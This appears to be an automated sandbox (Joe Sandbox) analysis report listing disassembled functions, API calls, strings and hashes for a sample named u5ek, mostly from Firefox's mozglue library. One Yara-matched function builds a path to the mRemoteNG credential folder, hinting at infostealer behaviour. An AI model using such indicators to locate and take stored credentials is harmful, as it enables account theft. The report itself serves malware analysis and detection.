Opcode ID: 6e90c81242c1e9c2c94fc0c313d709a31f20b286baa74042e540fbb46101e8c2
Instruction ID: 376db147b8e460b9c5b20c02fc9d29c717dfb07696c0b080504970435052c0a9
Opcode Fuzzy Hash: 6e90c81242c1e9c2c94fc0c313d709a31f20b286baa74042e540fbb46101e8c2
Instruction Fuzzy Hash: 4FB1A171A04B858BDB02CF68C48055FF3F5FFC9328B144669E8999B342DB35E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6BBB6060: moz_xmalloc.MOZGLUE(00000024,E3FAEE98,00000000,?,00000000,?,?,6BBB5FCB,6BBB79A3), ref: 6BBB6078

free.MOZGLUE(-00000001), ref: 6BBB72F6
free.MOZGLUE(?), ref: 6BBB7311

Strings

333s, xrefs: 6BBB7226
Spliced unique strings, xrefs: 6BBB7340
Copied unique strings, xrefs: 6BBB7320
333s, xrefs: 6BBB731B

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: fe63560ba46176c55de2456aafc5900e65a3142c91402958d2079d08fb14de10
Instruction ID: 554bfc5fd4cc32208235ea8afc373ee5fd8c7ab4b6c4cb4f97bd8a850cb6d87f
Opcode Fuzzy Hash: fe63560ba46176c55de2456aafc5900e65a3142c91402958d2079d08fb14de10
Instruction Fuzzy Hash: 0071B471F006598FDB08CF69D8906ADB7F2EF84304F25812DD81AAB210DB79E946CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BBCC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BBCC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6BBCC29E

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: b6dae3869af3c4bb960ca35af700ee66cc17be8188a9dc4cf11e490998db2462
Instruction ID: e84fe60ac555634568877e41ef21f90c7137c8128b30715c0832cd36957b2003
Opcode Fuzzy Hash: b6dae3869af3c4bb960ca35af700ee66cc17be8188a9dc4cf11e490998db2462
Instruction Fuzzy Hash: 9661A971D046588FCB24CFACD8809AFBBB5EF89310F154569E812AB250C735A945CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417BAE

Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B

DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB

Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4

DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBCA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6BBBCA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBBCA69
Sleep.KERNEL32 ref: 6BBBCADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBBCAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBBCAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6BBBCB19

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: a524d6b4216b94334ef0e090ca795da38a4967679ee3071625b1bf2cc4a8f8c0
Instruction ID: 206aab33e7f8d2037fc8f77a49e7600d492114c1a8cbf9e3fff40529ed867fb5
Opcode Fuzzy Hash: a524d6b4216b94334ef0e090ca795da38a4967679ee3071625b1bf2cc4a8f8c0
Instruction Fuzzy Hash: 3B212131A047888BC708EF38A84217FB7BAFFC6345F408628E955A7194EFB9D585C781

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7EB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 6BB7EBB5

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BBAD7F3), ref: 6BB7EBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EBD6
free.MOZGLUE(?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EC0E

Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6BBAD7F3), ref: 6BB7EC1A

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: 81485d0c49b3105810225cd2d03b82bd07dffb633ad97cd427288f18b61c472e
Instruction ID: 188b9a56b3c9f40eac65d31a10af782f65b09d23cfd842802c8cee2fd682846e
Opcode Fuzzy Hash: 81485d0c49b3105810225cd2d03b82bd07dffb633ad97cd427288f18b61c472e
Instruction Fuzzy Hash: 8511ECF1A442945BE7109A78AC89BAF7EACDF02758F140435E415DB340E3B9DD0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00415960 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(042F6BF8,?,?,?,0040F76C,?,042F6BF8,00000000), ref: 0041596C
lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,042F6BF8,042F6BF8,?,0040F76C,?,042F6BF8), ref: 00415990
lstrlen.KERNEL32(?,?,0040F76C,?,042F6BF8), ref: 004159A7
wsprintfA.USER32 ref: 004159C7

Strings

C:\Users\user\AppData\Roaming\mRemoteNG\, xrefs: 0041598B, 004159C0, 004159D0
%s%s, xrefs: 004159B5

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
API String ID: 1206339513-1027354905
Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BBC0270
GetCurrentThreadId.KERNEL32 ref: 6BBC02E9
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBC02F6
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBC033A

Strings

about:blank, xrefs: 6BBC020F

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: f168bf8207b5814c9cd8ef3804d2ad3f6d4f31394fb69f366ab32615d9c4b0b9
Instruction ID: a879cd03a4536a3d2a361ff4beb3b3133b1c405fc841f4c3acb4ce4cd4c9bba6
Opcode Fuzzy Hash: f168bf8207b5814c9cd8ef3804d2ad3f6d4f31394fb69f366ab32615d9c4b0b9
Instruction Fuzzy Hash: 4251BBB4A00659CFCB00DF68D880AAEB7F5FF89324F904559D919AB341D736F842CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F

GetCurrentThreadId.KERNEL32 ref: 6BBBE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6BBBE084,00000000), ref: 6BBBE137

Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6BBBE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6BBBE1E9

Part of subcall function 6BBB99A0: GetCurrentThreadId.KERNEL32 ref: 6BBB99C1
Part of subcall function 6BBB99A0: AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99CE
Part of subcall function 6BBB99A0: ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6BBBE13F

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: b07c8064ee71b9816ba7fefa64d889f3b66aa38f57427eaed9ef7f6e29d6341f
Instruction ID: ad6521b37ee102ec005a356bcbb313e91733534a5530c28cbb35877e1fa5e6bd
Opcode Fuzzy Hash: b07c8064ee71b9816ba7fefa64d889f3b66aa38f57427eaed9ef7f6e29d6341f
Instruction Fuzzy Hash: 0D3126B1A047809FD7049F28944137EF7E6EFDA388F00886DE8955B351DBB9C906C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB0210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBB0222
moz_xmalloc.MOZGLUE(0000000C), ref: 6BBB0231

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBB028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6BBB02F7

Strings

@, xrefs: 6BBB02D8

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 2e3ec79493a714e2370baed89da43470aa663589e481c8105a333a263c8a9888
Instruction ID: f4adc0bed2dd406a1508bcf77407a42ef19b30fb69974369dcc4bf1d013d6881
Opcode Fuzzy Hash: 2e3ec79493a714e2370baed89da43470aa663589e481c8105a333a263c8a9888
Instruction Fuzzy Hash: 2D31BEB2A00A508FEB54CF68C980B3AB7E6FF44714B54856DD95ADB340DB35EC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDAB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6BB9BFBD,.dll,00000000,00000000,00000000,6BB9BFBD), ref: 6BBDABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6BBDABD8

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BBDABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6BBDAC03

Strings

.dll, xrefs: 6BBDABB4, 6BBDABFA

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: 6c0c7ebbd6a4e8b305551c9442a4963b83d1718b9087e4f8ed14d84481fd076c
Instruction ID: 22652f1834075e9225b4c64a4ff11ed987dbb2f847b29b76db693b4570a6571a
Opcode Fuzzy Hash: 6c0c7ebbd6a4e8b305551c9442a4963b83d1718b9087e4f8ed14d84481fd076c
Instruction Fuzzy Hash: A001B5B2A0011A6FEB105E749C45ABFBAAEEF95350F050435FD09E3200E7BA9D558BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6BB7EE51,?), ref: 6BB7F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6BB7F0C2

Strings

ole32, xrefs: 6BB7F0AD
Could not find CoTaskMemFree, xrefs: 6BB7F0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6BB7F0DC

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: a7f2186df0edeb6cb81b0f10063dff2a53dc8e3c25fdbc3164ac337aa52266be
Instruction ID: 551f2b8ffc9760d58a22cc1e0672e6ab9e1bfc1b421cf3897e45a288dd0af7a3
Opcode Fuzzy Hash: a7f2186df0edeb6cb81b0f10063dff2a53dc8e3c25fdbc3164ac337aa52266be
Instruction Fuzzy Hash: B5E020B45447C1AF9F243EF5A81863637DEEF12605304843DE511D2700EE2ED004C739

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD73E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,6BB8434E), ref: 6BBD73EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6BBD7404
FreeLibrary.KERNEL32(?,?,6BB8434E), ref: 6BBD7413

Strings

SetProcessDpiAwarenessContext, xrefs: 6BBD73FE
user32.dll, xrefs: 6BBD73E6

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: 9eb07e4257282b676e8734d9c688cdc271d4bdbf8819b0674b20f63d09177190
Instruction ID: 90707486b4eaa72ac1ef2c77705b4324a333e31686b3ee55ad525fb2e8bfe7e3
Opcode Fuzzy Hash: 9eb07e4257282b676e8734d9c688cdc271d4bdbf8819b0674b20f63d09177190
Instruction Fuzzy Hash: AEE01A741013419BE7201FA5E908756BAEDEF05241F008829EA89C3600E7BAD4008B60

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87266), ref: 6BBB01C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6BBB01E7
FreeLibrary.KERNEL32(?,6BB87266), ref: 6BBB01FE

Strings

CryptCATAdminReleaseContext, xrefs: 6BBB01E1
wintrust.dll, xrefs: 6BBB01C3

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 2a2d9fbd45297bc99beaa966d0e6ac5e5ebf54b264a10b8b0998acc7416d0bf9
Instruction ID: fca4f1c8c7a2a38babd8a6346508fe888a95930b28e403da12537497641a26f8
Opcode Fuzzy Hash: 2a2d9fbd45297bc99beaa966d0e6ac5e5ebf54b264a10b8b0998acc7416d0bf9
Instruction Fuzzy Hash: 59E09A74481385DFEF105F65E9087367BEEAB07381F404425E904C3250DB7AC405DB20

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87297), ref: 6BBB0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6BBB0147
FreeLibrary.KERNEL32(?,6BB87297), ref: 6BBB015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6BBB0141
wintrust.dll, xrefs: 6BBB0123

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 8be7152021e0b3f2e529024ba0b2cd6d6b668e08a5f6b0c06cb5861d8ec406ee
Instruction ID: a3f136e42de8a8afa4e02f9730b6db98edcb150ebb79575cd6f40c9366e931bc
Opcode Fuzzy Hash: 8be7152021e0b3f2e529024ba0b2cd6d6b668e08a5f6b0c06cb5861d8ec406ee
Instruction Fuzzy Hash: 0AE09279446285EFEF106F6AEA08736BBEDE707341F408529AA04C7350DBBAC404CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87308), ref: 6BBB0178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6BBB0197
FreeLibrary.KERNEL32(?,6BB87308), ref: 6BBB01AE

Strings

wintrust.dll, xrefs: 6BBB0173
CryptCATCatalogInfoFromContext, xrefs: 6BBB0191

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

